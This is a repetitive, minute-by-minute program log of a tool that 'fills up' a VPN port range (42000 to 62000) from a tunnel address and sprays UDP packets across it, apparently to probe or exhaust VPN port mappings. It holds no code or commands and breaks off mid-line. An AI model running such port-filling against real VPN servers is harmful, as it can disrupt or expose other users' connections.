-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:04:06 -Starting port fill at 2020-09-06 11:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:05:05 -Starting port fill at 2020-09-06 11:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:06:05 -Starting port fill at 2020-09-06 11:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:07:05 -Starting port fill at 2020-09-06 11:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:08:05 -Starting port fill at 2020-09-06 11:09:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:09:06 -Starting port fill at 2020-09-06 11:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:10:06 -Starting port fill at 2020-09-06 11:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:11:05 -Starting port fill at 2020-09-06 11:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:12:04 -Starting port fill at 2020-09-06 11:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:13:05 -Starting port fill at 2020-09-06 11:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:14:04 -Starting port fill at 2020-09-06 11:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:15:04 -Starting port fill at 2020-09-06 11:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:16:04 -Starting port fill at 2020-09-06 11:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:17:04 -Starting port fill at 2020-09-06 11:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:18:05 -Starting port fill at 2020-09-06 11:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:19:04 -Starting port fill at 2020-09-06 11:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:20:06 -Starting port fill at 2020-09-06 11:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:21:05 -Starting port fill at 2020-09-06 11:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:22:06 -Starting port fill at 2020-09-06 11:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:23:07 -Starting port fill at 2020-09-06 11:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:24:06 -Starting port fill at 2020-09-06 11:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:25:05 -Starting port fill at 2020-09-06 11:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:26:05 -Starting port fill at 2020-09-06 11:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:27:07 -Starting port fill at 2020-09-06 11:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:28:07 -Starting port fill at 2020-09-06 11:29:02 -Using tun src ip: 